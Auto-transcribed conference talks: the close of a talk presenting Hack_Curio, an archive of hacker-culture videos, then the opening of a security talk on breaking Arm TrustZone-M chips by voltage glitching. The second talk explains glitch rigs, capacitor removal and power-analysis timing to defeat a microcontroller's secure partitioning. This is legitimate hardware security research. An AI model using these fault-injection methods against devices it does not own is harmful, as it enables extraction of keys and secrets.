Jean Bernard Condat. I'm representing a group, and I recently was born, it's called the CAU, the computer club in France. And I see myself on the stage, who is in fact in a mess with the policemen who are also present. I want to know, can I enter the Ministry of Iraqi Defense? 
I want to know how many munitions they have currently in their stock. Here, page 629 of this show. Iraq, the Idaas network, I-D-A-S, managed by the association called BTC, the access code, zero to exit, 41.81 access codes. Then you search in the paragraph in front, I won't come to the number of the central computer of the BTC society, to whom you will ask the whole of the government, media... Okay, so pretty incredible, right? And this story has been told in bits and pieces by French journalists. I'm working with another French journalist to try to kind of uncover the fuller history, as well as tell the story of kind of American and European hackers who did not get recruited by intelligence, but who nevertheless came from the underground, because they were breaking into systems, not maliciously, but they learned a lot, and they had really valuable knowledge that no one else had. I mean, it's kind of really incredible, right? And, you know, this history, whether it's just the transformation of the underground into security hackers, or in the case of France, where some portion of people were tapped to work for intelligence, informally, formally, with pressure, right, has yet to be written. And there's many remarkable elements about this, but basically I do think it's remarkable that it's a bunch of kind of amateurs who just were obsessed with networks, who were the ones holding the special knowledge that was needed by corporations and intelligence in order to start securing systems, right? The other kind of really interesting thing is that some of the best underground, non-malicious hacker crews were European. TISO, which had a lot of Austrian and German members, ADM, which is from France, was considered to be the best at exploit writing, right? So the entry, which I'm going to write with a French journalist, is going to reflect on this, and this is actually a big project that I'm working on as well, so I'll have more to say about it later. All right, so going from the past to the present. I mean, I guess we couldn't talk geopolitics and hacking without talking about Trump, talking about Putin. A slew of politicians that we know in recent years have used the hacker for their own political discourse, for their somehow political gain, and this next video will show us just that. This is under our hacker depictions section. It was posted by a scholar named Marietta Bozovic. So without further ado, let's listen to the way in which Putin sees the hacker. Russia is not doing well. Maybe theoretically, but the most important thing is that I'm deeply convinced that no hackers can adversely influence the hunt for a election campaign in another country. But it's all right. It doesn't affect the consciousness of the voters, the consciousness of the people, it doesn't affect any information, and it doesn't affect the final result. So that's my answer. We don't take the state level. We don't do it, we don't plan to do it. On the contrary, we try to do it. In some ways, yes, it's true that hackers are artistic and creative, etc. They just don't wake up early in the morning. Exactly. Maybe they don't wake up early in the morning. But what's important, I think, in here, and this is also what Bozovic points out in her entry, is that he uses this, of course, for his political gain to show that he is not influencing any hackers or any technologists who maybe identify as hackers or not. 
Influencing them, and because they are so free and artistic and sort of living in their creative world, that they're beyond his control. So partially it's true, but partially he's employing this to make a political statement about his non-involvement with any sort of... And what's interesting is all evidence points to the fact that the technologists who did the hacking just work at intelligence organizations. So we just have one more video, and we want to end on a positive note. A lot of stuff around hackers is sometimes depressing, especially when it comes to the law. They get arrested, they get thrown in jail, they commit suicide. And so we want to showcase a video that covers British and Finnish hacker Laurie Love, who's presented here at the CCC. Some of you may know that he faced extradition to the United States due to his alleged involvement with anonymous operation called OP last resort, which was kind of in support of Aaron Schwartz, who had committed suicide when he was facing many criminal charges. And we'll watch a clip where parliamentarians and others debate his case. A young man with a Sperger's syndrome awaits extradition to the United States facing charges of computer hacking, and is then likely to kill himself. It sounds familiar. He's not, of course, Gary McKinnon, who was saved by the Prime Minister, but Laurie Love, who faces in effect a death sentence. So when the Prime Minister introduced the foreign bar to in her words provide greater safeguards for individuals, surely she expected it to protect the vulnerable, like Gary McKinnon, like Laurie Love. The Honourable Gentleman, my Honourable Friend, obviously campaigned long and hard for Gary McKinnon, and obviously I took that decision, because at that time it was a decision for the Home Secretary to decide whether there was a human rights case for an individual not to be extradited. We subsequently changed the legal position on that, so this is now a matter for the courts. There are certain parameters that the courts look at in terms of the extradition decision, and that is then passed to the Home Secretary, but it is for the courts to determine the human rights aspects of any case that comes forward. It was right, I think, to introduce the foreign bar to make sure that there was that challenge for cases here in the United Kingdom, as to whether they should be held here in the United Kingdom, but the legal process is very clear, and the Home Secretary is part of that legal process. Lenin Keika. Okay, so the author of the entry, Naomi Colvin, is right there in the front, and she has a great sentence which says, In Lori Love, the US had definitively chosen the wrong target, principled, passionate, and articulate, certainly more articulate than Teresa May herself in the clip, which accompanies this article, Love vs. USA would be one for the underdog, and it was Love 1, he's not being extradited, and in part it was also because Naomi Colvin was part of the team that stopped it, so let's thank Naomi as well. And it's just really important to document some of the wins every once in a while, so do check that out. So we are now going to wrap up so that there's going to be 10 minutes for Q&A, but a few final reflections about this project. Exactly, so I think these videos show actual hackers and hackings, and at a more meta level demonstrate how hackers have become central to our popular imagination, how hackers and hacking are one medium to think through digital cultures, to think through politics. 
I mean, we care about culture, we care about representing, digging deep, looking at various angles of a certain culture, and I think that's the purpose, or I see this as the purpose of Biela, mine, Chris's, and our friends' projects, is that we really want to take the work that we've been doing and really pay tribute to this really huge, diverse community that you are. On a more practical level, being a little less meta, we do hope that people assign HackKirio entries in their courses, you could use them in high school, you could use them in college classes, maybe you could even use them in middle school, elementary, I don't know if that will work, but get it out there, and also for some of you, I think it will be fun to look at different tidbits of hacker history, and when you're at home for the holidays before you come to the CCC and you're like, oh man, my parents, they don't really understand what I do, you can fire up a video that kind of represents what you do and fire up another video that represents what you don't do. Exactly, and have a discussion instead of talking about politics, yeah. And so this is our last slide, what next? The site is live, share it. Our Twitter address is up there, we consider this a soft launch. We have 42 entries, but we'll get some feedback and tweak things, send video suggestions, spread the word. And to end, before Q&A, we just really want to thank the CCC, we want to thank Lisa for having us here, this is really an amazing place to launch, and we also want to thank everyone who made this possible from funding to the authors to the entire HackKirio team, so thank you so much, and we're here for a little bit of Q&A. Yeah, thank you. Thanks a lot for this beautiful talk. We are now open for the question mics. If there's any questions from the audience, please just stand up to one of the mics. Don't be shy. Nobody's more interested in hacking culture? Are you overwhelmed? There's someone on mic one, please. Thank you for this talk and for the energy that was in your talk, it was just amazing. I have one question to ask, what were the surprising moments for you in this research journey? Okay, that's a good question. In terms of the project, collaborating with others and building a website is very different than what academics often do, where we do often have to rely on ourselves and we get feedback. I think it does give a sense of the really beautiful relations at form, where you go back and forth with an author, with a web developer. It really does give you a sense of the deep social ties. We do have academics, but I think it's much deeper with hackers, so that's one thing. I am frustrated as an academic, where a lot of people do have very, very, very narrow conceptions of hackers. It's not a perfect world and there's a lot which we can change. It was very clear also that as academics, we weren't necessarily changing perception so much. This project was an effort to finally do that. It's like, see them, stop listening or reading just my words, because obviously that's not really changing Jack. So come see some of the videos. Yeah, and I guess for me, if you work in your own little bubble and you work in your own little corner, just in any type of science, you don't see as much as what's going on up there. For me, the whole definition of what it is to hack, what a hacker actually is, you start really opening your eyes out when you see, wow, there's 50, 100 other scholars out there that actually think a hacker is this or a hacker is that. 
And I think for me, that opened my eyes out really to think, hey, wow, this is what you think it means. That's so interesting. Thank you. Now a question from Mike too, please. Hi, thank you for the talk. It was very enlightening. I have two questions. The first one would be, could you tell us maybe a bit more about the server and the infrastructure you're using or are you just linking YouTube videos? The second one would be, how would you envision future engagement with students? Because I'm teaching a course for computer science test undergrads and we did something similar around movies and descriptions that they have to make around hacker movies. And they don't really learn how to reflect on social issues a lot in their studies. So I wonder how this could be integrated into the platform and how you could engage students further. So great questions. I mean, first of all, for the website, it runs on WordPress. It just seemed like an easy way to hack it up for this sort of thing and we hired actually a master's student from my department at McGill University. Thanks Joel, you're awesome. And then we're hosting the videos on Vimeo and they come from all sorts of different places. That's actually not the best or the most ideal solution in so far as like, you know, who knows if Vimeo is going to exist in 15 years, right? Internet archive, we looked into them and they were kind of like psyched about it, but it was going to be slower to deliver the video, right? So maybe if the project grows, we can at a certain point host our own videos, right? But like we'll have to sort of graduate there at the next level. The entries are all going to be creative commons and we're using clips that then we cite the entire clip and where it came from. We consider this fair use for those that may be wondering. And so we'll see how that goes. And for the second, I guess I could take the second question. Whenever I mean my students are not their digital media students, they're not competing science. But if you ever even try to touch along something around culture or something maybe around social sciences, always I think ask how is power related, how do these people relate to power? How do they relate to critique? How do they use these tools to critique something? And I think all of these videos and maybe even the videos that your students chose, if they just ask that question, whether they're studying computing science, whether they're studying geography or whatever it is, if they look at it from a form of power and how it's contested, I think that that's a way in which they really can engage into a certain topic really deeply. There's a nice little text by Foucault that's called What is Critique? I use it for my students that are non-maybe cultural studies students or whatever. That's a nice little text that could be with that. Thank you. One more question from Mike too please. So thank you again. And I wanted to ask you because I looked at the videos on the side and I see a lot of stories of single people. And I'm quite surprised to find very little stories of communities and showcases of hacker spaces. A lot of researchers I've spoke about are actually focusing on how communities work. So was there any conscious decision that you want to tell singular people's, singular person's stories instead of communities? 
First of all, that's a great piece of feedback because one of the things as an anthropologist that I've always loved about the hacker world is on the one hand, people often talk about rights that are tied to notions of individualism, but hacking is so collectivist. I mean look at the CCC. I mean you can't have a better example of a kind of ritual collective, effervescent experience, hacker spaces, right? So I do think it's really important to try to showcase that. And we do have videos around hacker spaces and they're being written up like the authors are writing about them now. But if that's not coming through the sites, we actually need to, right? But it does show, I mean one of the problems with video, and we will reflect on this, is that on the one hand while you could put a face to hacking, which is great, it's like it's not the hooded person, video has its own limits, right? Often it's an individual. It's often what journalists are interested in. And we also have to make sure that this isn't the whole of hacking. And also at times use the video to tell a different story than what the video is showing. So I think that's a great comment and we're going to keep that in mind because to me the collectivist community part of hacking is one of the most amazing parts that never makes it into kind of mainstream representation. That's great. Thank you. Thank you. Then we have a question from the internet first. Internet. Tell us. Hi. Talk to us. The question from the internet is when covering international scenes, are scenes like FRAC magazine use a source material? Is FRAC magazine a source? Yeah. I mean, FRAC magazine, remember the video that I showed around the fake French CCC? That is a larger project around how parts of the underground went pro and started doing security work. And FRAC is amazing. I mean, FRAC tells so much of that story. And what is also so interesting because I've done like almost 26 interviews, in-depth interviews around this. And like you'd expect in many hacker circles, there's a lot of diversity of opinions. And the one thing that people agree on was that like FRAC was awesome technically. And it brought very different types of people together. You know, FRAC hasn't come up in the video because it's one of these things that hasn't been documented, right? So much in documentaries or film. And again, it points to that problem, which is on the one hand, we're trying to show the faces of hacking. But we also have to make very, very clear that there's certain parts of hacker history that don't exist in video and don't take this as the definitive sort of word or record. No. Now the question from microphone two, please. Hi. I was wondering whether you plan to expand your categories if I didn't miss anything to something. For example, in my PhD, examples of hacking connected with biology, genetics, and digital fabrication, neurohacking, and so on. And also here at the CCC, there's a track dedicated to science that I think it's somehow related. Thanks. Great. Yeah, so if I can count correctly, I think we have 11 categories and we absolutely are expanding. And like biohacking is one that we want to include because actually, you know, hackers are like creating insulin in the context of the United States where insulin is ridiculously expensive. And some of the most important hacking, I think, is happening. So we're absolutely going to expand by a handful. We also don't want to go much more beyond 15 or 18. 
And one of the ways that we're also then handling that is that each entry comes with tags. And then there's going to be other groupings around tags. And certainly, I mean, what you've seen is live. It's live. It's live. But it's also very much beta. Yes, exactly. And if you've written also on this topic and you have an interesting video, please email us. Send it over. We'd be really interested to hear about your research. Yeah. And then we have another question on mic one, please. Thank you. My question is for Bella and it's about, would you say that your work with an on anonymous affected the way you engage with working with video after, after going deep into seeing how anonymous uses video as a medium to engage with the public as compared to other activist groups who are very less successful in that. That's great. I mean, that is definitely, you know, I on the one hand always use video in my class. And it's not just like hackers, you know, if I'm talking about Martin Luther King and something he said, I will show a video of what he said, because having me repeat it versus having MLK on the screen. And it's a lot more persuasive and we are in a moment where truth is not winning the game and we have to think about our game of persuasion. Right. That's just this is a kind of side project. But you're absolutely right. It was also anonymous who use so many videos, right, in a period where sure others had used videos, but it was groups like for example, in the media who turned 20 this year, who took videos of the world around us. Whereas anonymous created videos as a means for persuasion and it was very powerful at the time. And I am I am inspired to think about how can we think about persuasive mediums in all contexts in order to get our message out because again, we're not always winning in this regard. Truth can never speak on its own. Right. And we always need adjuncts and adjuvants in order to get truth message out there. And certainly it was anonymous in part that that helped me see the importance of video in a new way. So I'm really glad you mentioned that. Thank you. And then we have another question from the Internet. Yeah. And the next question from the Internet is how will you select the right curators for the entries and how do they decide how they are presented and contextualized? All right. So I mean, I've been working on hacker cultures for since 1998. Yeah. Mine is a journey has been a little bit shorter, but also for about 10 years. Yeah. And so I do. I know a lot of people working on different topics. And for the first round, we invited people. And it wasn't just academics. I've gotten journalists and have hackers are writing some entries as well. But they're just like a little bit harder to kind of get them to turn in their entries. And hopefully they will because again, it's not just who's been credentialed to talk about a topic. It's who knows about a topic, who has something to say and who's willing to go through the editing process. Because while journalists generally don't have to go through multiple edits because you all just really know how to write for the public, everyone else actually does struggle a little bit. And we do really try to get the entries written in such a way where we're presuming you know nothing about hackers or the video. It's not always easy then to write an entry that kind of starts from that low level. And then in terms of the contextualization, that's where we have three editors and curators. 
And I would actually even say four because our final editor, Matt Gorson, he was an MA student under me. He's doing a big project on security hacking with me at Dayton Society. He knows a ton. And it's precisely having many eyeballs on one entry that allows us to hopefully contextualize it properly. But you know, again, if something seems off, people should email us. And again, we're also open to responses from the community as well, which we have one response from Naomi, but you know, perhaps that will kind of grow into something larger. So when you ask why or why is it us that are curating or who's curating really, it's just a three of us that are doing this. And what kind of speech position are we coming from? I mean, we're anthropologists of hacker cultures. What does that mean? Maybe for you guys, it doesn't mean much or it means a lot or it's really, we've studied you guys for a long time. Yeah. But it's also cool because it's like, well, except for Paula, I mean, Chris and I, like, we have tenure and that may mean nothing to you all, but you know, hackers care about freedom and free speech. And tenure allows you to be free. I have tenure now. Oh, you do? Sweet. We all are free to kind of do what we want in interesting ways. And again, we're trying to experiment with mediums that go a little bit beyond the academic journal, which I'm totally behind. I think that there's really good things about the academic journal. I think there's really good things about the book, but we have the freedom to experiment with new mediums. And so hopefully this new medium will kind of reach different types of publics in a way that kind of academic journal articles will never reach. Are there any more questions? Party, party. Yeah, it's time. It looks like it. So I would like to invite you for another round of applause for Bella and Paula. Thank you guys. Thank you so much. You
Hacking and hackers can be hard to visualize. In the popular imagination, the figure alternates between a menacing, hooded figure or some sort of drugged-out and depressed juvenile hero (or perhaps a state-sponsored hacker). To counter such images, a group of us have spearheaded a new digitally-based video project, Hack_Curio that features hacker-related videos, culled from a range of sources, documentary film, newscasts, hacker conference talks, advertising, and popular film. In this talk, the Hack-Curio creators and builders will briefly discuss the purpose and parameters of Hack_Curio and spend most of the talk featuring our funniest, most compelling videos around hacking from around the world. We will use these to reflect on some of the more obscure or less commented on cultural and political features of hacking--features that will address regional and international dimensions of the craft and its impacts around the world. Hacking and hackers can be hard to visualize. In the popular imagination, the figure alternates between a menacing, hooded figure or some sort of drugged-out and depressed juvenile hero (or perhaps a state-sponsored hacker). To counter such images, a group of us (Chris Kelty, Gabriella Coleman, and Paula Bialski) have spearheaded a new digitally-based video project, Hack_Curio that features hacker-related videos, culled from a range of sources, documentary film, newscasts, hacker conference talks, advertising, and popular film. In this talk, the Hack-Curio creators and builders, will briefly discuss the purpose and parameters of Hack_Curio and spend most of the talk featuring our funniest, most compelling videos around hacking from around the world. We will use these to reflect on some of the more obscure or less commented on cultural and political features of hacking--features that will address regional and international dimensions of the craft and its impacts around the world. We will begin our talk by telling the audience what drove to build this website and what we learned in the process of collaborating with now over fifty people to bring it into being. After our introduction, we will showcase about 7-10 videos drawn from quite different sources (ads, parodies, movie clips, documentary film, and talks) and from different parts of the world (Mexico, Germany, South Africa, France) in order to discuss the cultural significance of hacking in relation to regional and international commonalities and differences. Finally, we will finish with a short reflection on why such a project, based on visual artifacts, is a necessary corollary to text-based discussions, like books and magazines, covering the history and contemporary faces of hacking.
10.5446/53149 (DOI)
Our next speaker's way is paved with broken trust zones. He's one of Forbes 30 under 30s in tech and please give a warm round of applause to Thomas Roth. I'm a security researcher, consultant and trainer affiliated with a couple of companies. Before we can start, I need to thank some people. We've been super helpful and anytime I was stuck somewhere or just wanted some feedback, they immediately helped me. Also Colin O'Flynn, he gave me constant feedback and helped me with some troubles, gave me tips and so on. Without these people and many more who paved the way towards this research, I wouldn't be here. Also thanks to NXP and Microchip, who I had to work with as part of this talk and it was awesome. I had a lot of very bad vendor experience, but these two were really nice to work with. Also some prior work, Colin O'Flynn and Alex DeVire released a paper last year on device power analysis across hardware security domains and they basically looked at trust zone from a differential power analysis viewpoint. Otherwise trust zone is pretty new, but lots of work has been done on the big or real trust zone and lots of work on fault injection. It would be far too much to list here. Just Google fault injection and you'll see what I mean. Before we start, what is trust zone? Trust zone is the small trust zone. It's a simplified version of the big trust zone that you find on Cortex-A processors. If you have an Android phone, chances are very high that your phone runs trust zone and that your key store of Android is backed by trust zone. Trust zone splits the CPU into a secure and non-secure world. For example, you can say that a certain peripheral should only be available to the secure world. For example, if you have a crypto accelerator, you might only want to use it in the secure world. It also, if you're wondering what's the difference between MPU, it also comes with two MPUs, sorry, not MMUs MPUs. So last year we gave a talk on Bitcoin wallets and so let's take those as an example. On a Bitcoin wallet, you often have different apps. For example, for Bitcoin, Dogecoin or Monero and then underneath you have an operating system. The problem is kind of that this operating system is very complex because it has to handle graphics rendering and so on and so forth and chances are high that it gets compromised. If it gets compromised, all your funds are gone. With trust zone, you could basically have a second operating system separated from your normal one that handles all the important stuff like firmware update, key store attestation and so on and reduces your text surface. The reason I actually looked at trust zone M is we got a lot of requests for consulting on trust zone M. So, basically, after our talk last year, a lot of companies reached out to us and said, okay, we want to do this, but more securely and a lot of them try to use trust zone M for this. And so far, there's been, as far as I know, little public research into trust zone M and whether it's protected against certain types of attacks. We also have companies that start using them as secure chips. For example, in the automotive industry, I know somebody who was thinking about putting them into car keys. I know about some people in the payment industry evaluating this and a set of hardware wallets. And one of the terms that come up again and again is this is a secure chip. But I mean, what is a secure chip? 
Without a threat model, there's no such thing as a secure chip because there are so many attacks and you need to have a threat model to understand what are you actually protecting against. So, for example, a chip might have software features or hardware features that make the software more secure, such as NX bit and so on and so forth. And on the other hand, you have hardware attacks, for example, debug ports, side channel attacks and fault injection. And often the description of a chip doesn't really tell you what it's protecting you against. And often I would even say it's misleading in some cases. And so you will see, oh, this is a secure chip and you ask marketing and they say, yeah, it has the most modern security features. But it doesn't really specify whether they are, for example, protecting against fault injection attacks or whether they consider this out of scope. In this talk, we will exclusively look at hardware attacks. And more specifically, we will look at fault injection attacks on trust on them. And so all of the attacks we're going to see are local to the device only. You need to have it in your hands and there's no chance normally of remotely exploiting them. Yeah. So this will be our agenda. We will start with a short introduction of trust on them, which will have a lot of theory on memory layout and so on. We will talk a bit about the fault injection setup. And then we will start attacking real chips, these three, as you will see. So on a Cortex M processor, you have a flat memory map. You don't have a memory management unit and all your peripherals, your flash, your RAM, it's all mapped to a certain address and in memory. And trust on them allows you to partition your flash or your RAM into secure and nonsecure parts. And so, for example, you could have a tiny secure area because your secure code is very small and a big nonsecure area. The same is true for RAM and also for the peripherals. So for example, if you have a display and a crypto engine and so on, you can decide whether these peripherals should be secure or nonsecure. And so let's talk about these two security states, secure and nonsecure. Well, if you have code running in secure flash or you have secure code running, it can call anywhere into the nonsecure world. It's basically the highest privilege level you can have and so there's no protection there. However, the opposite, if we try to go from the nonsecure world into the secure world, would be insecure because, for example, you could jump to the parts of the code that are behind certain protections and so on. And so that's why if you try to jump from nonsecure code into secure code, it will cause an exception. And to handle that, there's a third memory state which is called nonsecure callable. And as the name applies, basically your nonsecure code can call into the nonsecure callable code. More specifically, it can only call to nonsecure callable code addresses where there's an SG instruction which stands for secure gateway. And the idea behind the secure gateway is that if you have a nonsecure kernel running, you probably also have a secure kernel running. And somehow this secure kernel will expose certain system calls, for example. And so we want to somehow call from the nonsecure kernel into these system calls. But as I've just mentioned, we can't do that because this will, unfortunately, cause an exception. And so the way this is handled on trust zone M is that you create so-called secure gateway veneer functions. 
These are very short functions in the nonsecure callable area. And so if we want, for example, to call the load key system call, we would call the load key veneer function, which in turn would call the real load key function. And these veneer functions are super short. So if you look at this assembly of them, it's like two instructions. It's a secure gateway instruction and then a branch instruction towards your real function. And so if we combine this, we end up with this diagram. Secure can call into nonsecure. Secure can call into NSC and NSC can call into the secure world. But how do we manage these memory states? How do we know what security status and address have? And so for this, in trust zone M, we use something called attribution units. And by default, there are two attribution units available. The first one is the SAU, the security attribution unit, which is standard across chips. It's basically defined by ARM how you use this. And then there's the IDAU, the implementation defined attribution unit, which is basically custom to the silicon vendor, but can also be the same across several chips. And to get the security state of the address, the security attribution of both the SAU and the IDAU are combined. And whichever one has the higher privilege level will basically win. And so let's say our SAU says this address is secure, and our IDAU says this address is nonsecure. The SAU wins because it's the highest privilege level. And basically, our address will be considered secure. This is a short table. If both the SAU and the IDAU agree, we will be nonsecure. If both say, hey, this is secure, it will be secure. However, if they disagree and the SAU says, hey, this address is secure, the IDAU says yes, it's nonsecure. It will still be secure because secure is the higher privilege level. The opposite is true. And even with nonsecure callable, secure is more privileged than NSC. And so the secure will win. But if we mix NS and NSC, we get nonsecure callable. OK. My initial hypothesis when I read all of this was if we break or disable the attribution units, we probably break the security. And so to break these, we have to understand them. And so let's look at the SAU, the security attribution unit. It's standardized by ARM. It's not available on all ships. And it basically allows you to create memory regions with different security states. So for example, if the SAU is turned off, everything will be considered secure. And if we turn it on, but no regions are configured, still everything will be secure. We can then go and add, for example, address ranges and make them NSC or nonsecure and so on. And this is done very, very easily. You basically have these five registers. You have the SAU control register where you basically can turn it on and off. You have the SAU type, which gives you the number of supported regions on your platform because this can be different across different ships. And then we have the region number register, which you use to select the region you want to configure. And then you set the base address and the limit address. And that's basically it. So for example, if we want to set region zero, we simply set the R&R register to zero. Then we set the base address to 0x1000. We set the limit address to 0x1fe0, which is identical to 1fff because there are some other bits behind there that we don't care about right now. And then we turn on the security attribution unit and now our memory range is marked as secure. 
If you want to create a second region, we simply change R&R to, for example, 1. Again insert some nice addresses, turn on the SAU, and we have a second region this time from 4,000 to 5fff. So to summarize, we have three memory security states. We have S secure and we have NSC non-secure callable and we have NS non-secure. We also have the two attribution units, the SAU, standard by ARM, and the IDAU, which is potentially custom. We will use SAU and IDAU a lot, so this was very important. Cool. Let's talk about fault injection. So as I've mentioned, we want to use fault injection to compromise trust zone. And the idea behind fault injection or as it's also called glitching is to introduce faults into your chip. So for example, you cut the power for a very short amount of time or you change the period of the clock signal or even you could go and inject electromagnetic shocks in your chip. You can also shoot at it with laser and so on and so forth. Lots of ways to do this. And the goal of this is to cause undefined behavior. And in this talk, we will specifically look at something called voltage glitching. And so the idea behind voltage glitching is that we cut the power to the chip for a very, very short amount of time at a very precisely timed moment. And this will cause some interesting behavior. So basically, if you would look at this on an oscilloscope, we would basically have a stable voltage, stable voltage, stable voltage, and then suddenly it drops and immediately returns. And this drop will only be a couple of nanoseconds long. And so for example, you can have glitches that are 10 nanoseconds long or 15 nanoseconds long and so on. Depends on your chip. And yeah. And this allows you to do different things. So for example, a glitch can allow you to skip instructions. It can corrupt flash reads or flash writes. It can corrupt memory register or register reads and writes. And skipping instructions for me is always the most interesting one because it allows you to directly go from disassembly to understanding what you can potentially jump over. So for example, if we have some code, this would be a basic firmware boot up code. We have an initialized device function. And we have a function that basically verifies the firmware that's in flash. And then we have this Boolean check where our firmware is valid. And now if we glitch at just the right time, we might be able to glitch over this check and boot our potentially compromised firmware, which is super nice. So how does this relate to a trust zone? Well, if we managed to glitch over an able trust zone, we might be able to break trust zone. So how do you actually do this? Well, we need something to wait for a certain delay and generate a pulse at just the right time with very high precision. We're talking about nanoseconds here. And we also need something to drop the part to the target. And so if you need precise timing and so on, what works very well is an FPGA. And so for example, the code that I'll release as part of this all runs on the LASUS iStick, which is roughly 30 bucks, and you need a cheap MOSFET. And so together, this is like $31 of equipment. And on a setup site, this looks something like this. You would have your FPGA, which has a trigger input. And so for example, if you want to glitch something during the boot up of a chip, you could connect this to the reset line of the chip. And then we have an output for the glitch pulse. 
And then if we hook this all up, we basically have our power supply to the chip, run over a MOSFET, and then if the glitch pulse goes high, we drop the power to ground, and the chip doesn't get power for a couple of nanoseconds. Let's talk about this power supply, because a chip has a lot of different things inside of it. So for example, a microcontroller has a CPU core. We have a Wi-Fi peripheral. We have GPIO. We might have Bluetooth and so on. And often these peripherals run at different voltages. And so while our microcontroller might just have a 3.3 volt input, internally, there are a lot of different voltages at play. And the way these voltages are generated often is using in-chip regulators. And basically, these regulators connect to the 3.3 voltage in and then generate the different voltages for the CPU core and so on. But what's nice is that on a lot of chips, there are behind the core regulator so-called bypass capacitors. And these external capacitors are basically there to stabilize the voltage, because regulators tend to have a very noisy output, and you use the capacitor to make it more smooth. But if you look at this, this also gives us direct access to the CPU core power supply. And so if we just take a heat gun and remove the capacitor, we actually kind of change the pinout of the processor, because now we have a 3.3 voltage in. We have a point to input the core voltage. And we have ground. So we basically gained direct access to the internal CPU core voltage rails. The only problem is these capacitors are there for a reason. And so if we remove them, your chip might stop working. But very easy solution. You just hook up a power supply to it, set it to 1.2 volts or whatever, and then suddenly it works. And this also allows you to glitch very easily. You just glitch on your power rail towards the chip. And so this is our current setup. So we have the lattice-i-stick. We also use a multiplexer as an analog switch to cut the power to the entire device if we want to reboot everything. We have a MOSFET, and we have a power supply. Now hooking this all up on a breadboard is fun the first time. It's OK the second time, but the third time it begins to really, really suck. And as soon as something breaks with like 100 jumper wires on your desk, the only way to debug it is to start over. And so that's why I decided to design a small hardware platform that combines all of these things. So it has an FPGA on it. It has analog input. And it has a lot of glitch circuitry. And it's called the Mark 11. If you've read William Gibson, you might know where this is from. And it contains a Lattice i40, which has a fully open source 2-chilling thanks to Clifford Wolfe and so on. And this allows us to very, very quickly develop new triggers, develop new glitch code and so on. And it makes compilation and everything really, really fast. It also comes with three integrated power supplies. So we have a 1.2-volt power supply, 3.35 volts and so on. And you can use it for a DPA. And this is based around some existing devices. So for example, the FPGA part is based on the 1-bit squared icebreaker. The analog front end, thanks to Colin O'Flynn, is based on the chip whisperer Nano. And then the glitch circuit is basically what we've been using on breadboards for quite a while, just combined on a single device. And so unfortunately, as always with hardware, production takes longer than you might assume. 
But if you drop me a message on Twitter, I'm happy to send you a PCB as soon as they work well, and the bomb is around 50 bucks. Cool. So now that we are ready to actually attack chips, let's look at an example. So the very first chip that I encountered that you trust on M was the microchip Sem L11. And so this chip was released in June 2018. And it's kind of a small, slow chip. It runs at 32 megahertz. It has up to 64 kilobytes of flash and 16 kilobytes of S-RAM. But it's super cheap. It's like $1.80 at quantity one. And so it's really nice, really affordable. And we had people come up to us and suggest, hey, I want to build a TPM on top of this, or I want to build a hardware wallet on top of this, and so on and so forth. And if we look at the website of this chip, it has a lot of security in it. So it's the best contribution to IoT security winner of 2018. And if you just type secure into the word search, you get like 57 hits. So this chip is 57 secure. And even on the website itself, you have like chip level security. And then if you look at the further descriptions, you have robust chip level security, including chip level temper resistance, active shield, protects against physical attacks, and resist micro probing attacks. And even in the datasheet, where I got really worried was, because I said I do a lot with a core voltage, it has a brownout detector that has been calibrated in production and must not be changed and so on. Yeah, to be fair, when I talked to Microchip, they mentioned that they absolutely want to communicate that this chip is not hardened against hardware attacks. But I can see how somebody who looks at this would get the wrong impression given all the terms and so on. Anyway, so let's talk about the trust zone in this chip. So the sem11 does not have a security attribution unit. Instead, it only has the implementation defined attribution unit. And the configuration for this implementation defined attribution unit is stored in the user row, which is basically the configuration flash. It's also called fuses in the datasheet sometimes, but it's really, I think it's flash based. I haven't checked, but I'm pretty sure it is because you can read it, write it, change it, and so on. And then the IDAU, once you've configured it, will be configured by the boot ROM during the start of the chip. And the idea behind the IDAU is that all your flash is partitioned into two parts. You have the boot loader part and the application part. And both of these can be split into secure, non-secure, callable, and non-secure. So you can have a boot loader, a secure, and a non-secure one, and you can have an application, a secure, and a non-secure one. And the size of these regions is controlled by these five registers. And for example, if we want to change our non-secure application to be bigger and make our secure application a bit smaller, we just fill it with these registers and the sizes will adjust. And the same with the boot loader. So this is pretty simple. How do we attack it? My goal initially was I want to somehow read data from the secure world while running code in the non-secure world. So jump the security gap. My code in non-secure should be able to, for example, extract keys from the secure world. And my attack path for that was, well, I glitched the boot ROM code that loads the IDAU configuration. But before we can actually do this, we need to understand, is this chip actually glitchable? And is it susceptible to glitches or do we immediately get thrown out? 
And so I used a very simple setup where I just had a firmware and tried to glitch out of a loop and enable an LED. And I had success in less than five minutes. And super stable glitches almost immediately. Like, when I saw this, I was 100% sure that I messed up my setup or that the compiler optimized out my loop or that I did something wrong because I never glitched the chip in five minutes. And so this was pretty awesome. But I also spent another two hours verifying my setup. So okay, cool. We know this chip is glitchable. So let's glitch it. What do we glitch? Well, if we think about it, somewhere during the boot ROM, these registers are read from Flash and then some hardware is somehow configured. We don't know how because we can't dump the boot ROM. We don't know what's going on in the chip. And the datasheet has a lot of pages and I'm a millennial. So I read what I have to read and that's it. But my basic idea is if we somehow manage to glitch the point where it tries to read the value of the AS register, we might be able to set it to zero because most chip peripherals will initialize to zero. And if we glitch over the instruction that reads AS, maybe we can make our non-secure application bigger so that actually we can read the secure application data because now it's considered non-secure. But problem one, the boot ROM is not dumpable. So we cannot just disassemble it and figure out when does it roughly do this. And the problem two is that we don't know when exactly this reader cures and our glitch needs to be instruction precise. We need to hit just the right instruction to make this work. And the solution is brute force. But I mean, like, nobody has time for that, right? So if the chip boots for two milliseconds, that's a long range we have to search for glitches. And so very easy solution, power analysis. And it turns out that, for example, RISCure has done this before where basically they tried to figure out where in time a JTEC lock is set by comparing the power consumption. And so the idea is we basically write different values to the AS register. Then we collect a lot of power traces. And then we look for the differences. And this is relatively simple to do if you have a chip whisperer. So this was my rough setup. So we just have the chip whisperer light. We have a breakout with the chip we want to attack and a programmer. And then we basically collect a couple of traces. And in my case, even just 20 traces are enough, which takes, I don't know, like half a second to run. And if you have 20 traces in unsecure mode, 20 traces in secure mode, and you compare them, you can see that there are clear differences in the power consumption starting at a certain point. And so I wrote a script that does some more statistics on it and so on. And that basically told me the best glitch candidate starts at 2.18 milliseconds. And this needs to be so precise because as I said, we're in the nanosecond range. And so we want to make sure that we have the right point in time. Now how do you actually configure, how do you build this setup where basically you get a success indication once you broke this? For this, I needed to write a firmware that basically attempts to read secure data. And then if it's successful, it enables a GPIO. And if it fails, it does nothing. And I just reset and try again. And so I knew my rough delay and I was triggering off the reset of the chip. Then I just tried any delay after it and tried different glitch pulse 